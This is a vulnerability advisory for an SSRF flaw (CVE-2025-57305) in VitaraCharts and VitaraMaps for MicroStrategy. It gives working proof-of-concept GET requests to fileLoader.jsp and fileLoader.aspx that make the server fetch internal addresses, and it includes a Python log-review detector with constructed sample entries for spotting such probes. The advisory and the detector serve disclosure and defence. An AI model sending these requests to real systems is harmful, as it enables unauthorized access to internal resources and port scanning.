CVE-2025-57305 - Server-Side Request Forgery in VitaraCharts & VitaraMaps for MicroStrategy
Description
VitaraCharts version 5.3.5 and VitaraMaps version 5.3 are vulnerable to Server-Side Request Forgery (SSRF) via the fileLoader.jsp and fileLoader.aspx endpoints, which allows attackers to issue arbitrary HTTP requests using the file query string parameter and read full responses.
Proof of Concept
Java
The following proof-of-concept demonstrates controlling the file parameter to obtain the response from an HTTP request to http://127.0.0.1 on port 9000:
GET /VitaraCharts/fileLoader.jsp?callback=vitaraJsonPFileOnLoad0&file=http://127.0.0.1:9000&ctx=defaultSVGs&vitaraJsonpFileOnLoad0=jQuery HTTP/1.1
.NET
The following proof-of-concept demonstrates controlling the file parameter to obtain the response from an HTTP request to http://127.0.0.1 on port 9000:
GET /VitaraCharts/fileLoader.aspx?callback=test&file=https://127.0.0.1:9000&ctx=defaultSVGs&type=txt
Impact
An attacker who can access the fileLoader.jsp endpoint may provide absolute URLs to arbitrary locations and gain unauthorized access to internal resources, effectively bypassing access controls. Additionally, SSRF allows an attacker to perform port scanning against internal hosts by comparing the HTTP responses for URLs with differing ports.
Recommended CVSSv3.1: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N&version=3.1
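For log review, the following added example (not part of the original advisory and not vendor code) flags requests to the two fileLoader endpoints whose file parameter is an absolute URL, then groups them per client and destination host to surface the differing-port pattern described above. The combined access log format, the sample entries and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# The two endpoints named in the advisory; the path prefix varies per deployment.
LOADER = re.compile(r"/fileLoader\.(?:jsp|aspx)$", re.IGNORECASE)
# Client address and request target from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+)[^"]*"')
# Absolute (scheme://) or scheme-relative (//host) value in the `file` parameter.
ABSOLUTE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
DEFAULT_PORTS = {"http": 80, "https": 443}

SAMPLE_LOG = [  # constructed entries, not taken from a real system
    '203.0.113.7 - - [02/Oct/2025:10:00:01 +0000] "GET /VitaraCharts/fileLoader.jsp'
    '?callback=cb&file=http://127.0.0.1:9000&ctx=defaultSVGs HTTP/1.1" 200 512',
    '203.0.113.7 - - [02/Oct/2025:10:00:02 +0000] "GET /VitaraCharts/fileLoader.jsp'
    '?callback=cb&file=http%3A%2F%2F127.0.0.1%3A9001&ctx=defaultSVGs HTTP/1.1" 200 0',
    '203.0.113.7 - - [02/Oct/2025:10:00:03 +0000] "GET /VitaraCharts/fileLoader.aspx'
    '?callback=cb&file=https://127.0.0.1:9002&ctx=defaultSVGs&type=txt HTTP/1.1" 500 0',
    '198.51.100.4 - - [02/Oct/2025:10:05:00 +0000] "GET /VitaraCharts/fileLoader.jsp'
    '?callback=cb&file=pie.svg&ctx=defaultSVGs HTTP/1.1" 200 2048',  # relative name
]

def ssrf_candidates(lines):
    """Yield (client, host, port) for loader requests whose `file` is an absolute URL."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        request = urlsplit(target)
        if not LOADER.search(request.path):
            continue
        # parse_qs percent-decodes, so file=http%3A%2F%2F... is caught as well.
        for value in parse_qs(request.query).get("file", []):
            if not ABSOLUTE.match(value.strip()):
                continue
            try:
                dest = urlsplit(value.strip())
                port = dest.port or DEFAULT_PORTS.get(dest.scheme.lower(), 0)
                host = dest.hostname or ""
            except ValueError:  # malformed authority or out-of-range port
                host, port = "", 0
            yield client, host, port

def port_sweeps(lines, threshold=3):
    """Map (client, destination host) to probed ports when at least `threshold` differ."""
    seen = defaultdict(set)
    for client, host, port in ssrf_candidates(lines):
        seen[(client, host)].add(port)
    return {key: sorted(ports) for key, ports in seen.items() if len(ports) >= threshold}
```

Any hit from `ssrf_candidates` is worth triage on its own; `port_sweeps` only ranks the clients that varied the port against one destination.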
Disclosure Timeline
- June 12, 2025 - Vulnerability Discovery
- August 11, 2025 - Contacted Vendor
  - no response
- September 23, 2025 - CVE ID Reserved
- October 2, 2025 - Public Disclosure (current document)